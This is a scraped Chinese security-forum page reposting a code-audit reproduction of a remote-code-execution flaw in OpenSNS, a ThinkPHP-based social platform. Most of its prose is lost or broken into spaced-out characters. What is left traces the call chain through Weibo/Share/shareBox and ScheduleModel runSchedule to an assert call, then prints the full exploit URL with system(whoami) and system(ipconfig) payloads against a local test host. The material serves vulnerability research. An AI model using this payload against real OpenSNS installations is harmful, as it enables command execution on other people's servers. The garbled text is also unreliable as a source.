[7624] 2021-06-28_代码审计opensns代码审计复现

文档创建者:s7ckTeam
浏览次数:13
最后更新:2025-01-17
2021-06-28_代码审计opensns代码审计复现   |   o p e n s n s   N 1 c E   F 1 2 s e c   2 0 2 1 - 0 6 - 2 8 N 1 c E 稿 稿 ( m o o n v ) h t t p s : / / m p . w e i x i n . q q . c o m / s / 5 _ H x H E F r C x O C a g G O Q P O C D w p o c   P h p S t u d y 2 0 1 6 P h p s t o r m 2 0 2 0 . 3 . 2 t h i n k p h p / / 访 访   ? s = W e i b o / S h a r e / s h a r e B o x & q u e r y = 1 7 q u e r y s h a r a b o x . h t m l
q u e r y ' p a r a m ' W e i b o / S h a r e / f e t c h S h a r e { : W ( ' W e i b o / S h a r e / f e t c h S h a r e ' , a r r a y ( ' p a r a m ' = > $ p a r s e _ a r r a y ) ) } W T h i n k P H P / C o m m o n / f u n c t i o n s . p h p 1 1 7 4 R (   U R L     [ : / / ] [ / ] / { : W ( W e i b o / S h a r e / f e t c h S h a r e , a r r a y ( p a r a m = > $ p a r s e _ a r r a y ) ) } s h a r e b o x . h t m l W e i b o / S h a r e / f e t c h S h a r e
q u e r y ' p a r a m ' W e i b o / S h a r e / f e t c h S h a r e D m o d e l q u e r y = a p p = C o m m o n % 2 6 M o d e l = S c h e d u l e % 2 6 m e t h o d = r u n S c h e d u l e % 2 6 i d C o m m o n / M o d e l / S c h e d u l e M o d e l a s s g i n F e t c h D W e i b o / S h a r e w e i b o W e i b o / M o d e l / S h a r e M o d e l f e t c h S h a r e a s s g i n F e t c h g e t i n f o D W e i b o / M o d e l / S h a r e M o d e l
g e t i n f o a p p M o d e l m e t h o d D q u e r y = a p p = C o m m o n W e i b o A d m i n % 2 6 M o d e l = % 2 6 m e t h o d = m o o n v p o c q u e r y = a p p = C o m m o n % 2 6 M o d e l = S c h e d u l e % 2 6 m e t h o d = r u n S c h e d u l e % 2 6 i d D C o m m o n / M o d e l / S c h e d u l e M o d e l / r u n S c h e d u l e m o o n v r u n S c h e d u l e D  
s t a t u s m e t h o d a r g s m e t h o d - > p o c q u e r y = a p p = C o m m o n % 2 6 m o d e l = S c h e d u l e % 2 6 m e t h o d = r u n S c h e d u l e % 2 6 i d [ s t a t u s ] = 1 % 2 6 i d [ m e t h o d ] = S c h e d u l e - > _ v a l i d a t i o n F i e l d I t e m % 2 6 i d [ a r g s ] = m e t h o d D ( M o d e l ) _ v a l i d a t i o n F i e l d I t e m S c h e d u l e m o d e l _ v a l i d a t i o n F i e l d I t e m P S
1 v a l 4 f u n c t i o n 2 v a l 6 3 a r g s d a t a v a l 0 4 v a l 1 a s s e r t c a l l _ u s e r _ f u n c _ a r r a y 3 v a l [ 0 ] = c m d   , d a t a d a t a [ c m d ] p o c / i n d e x . p h p ? s = w e i b o / S h a r e / s h a r e B o x & q u e r y = a p p = C o m m o n % 2 6 m o d e l = S c h e d u l e % 2 6 m e t h o d = r u n S c h e d u l e % 2 6 i d [ s t a t u s ] = 1 % 2 6 i d [ m e t h o d ] = S c h e d u l e - > _ v a l i d a t i o n F i e l d I t e m % 2 6 i d [ 4 ] = f u n c t i o n % 2 6 [ 6 ] [ ] = % 2 6 i d [ 0 ] = c m d % 2 6 i d [ 1 ] = a s s e r t % 2 6 i d [ a r g s ] = c m d = s y s t e m ( w h o a m i ) U p l o a d s _ D o w n l o a d _ 2 0 2 0 - 0 5 - 1 4 _ 5 e b c a 0 6 6 a 3 f e f h t t p : / / 1 2 7 . 0 . 0 . 1 / i n d e x . p h p ? s = w e i b o / S h a r e / s h a r e B o x & q u e r y = a p p = C o m m o n % 2 6 m o d e l = S c h e d u l e % 2 6 m e t h o d = r u n S c h e d u l e % 2 6 i d [ s t a t u s ] = 1 % 2 6 i d [ m e t h o d ] = S c h e d u l e -
% 3 E _ v a l i d a t i o n F i e l d I t e m % 2 6 i d [ 4 ] = f u n c t i o n % 2 6 [ 6 ] [ ] = % 2 6 i d [ 0 ] = c m d % 2 6 i d [ 1 ] = a s s e r t % 2 6 i d [ a r g s ] = c m d = s y s t e m ( i p c o n f i g )       |   B y p a s s   W A F     H T T P H T T P S       |     B Y P A S S - ~
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则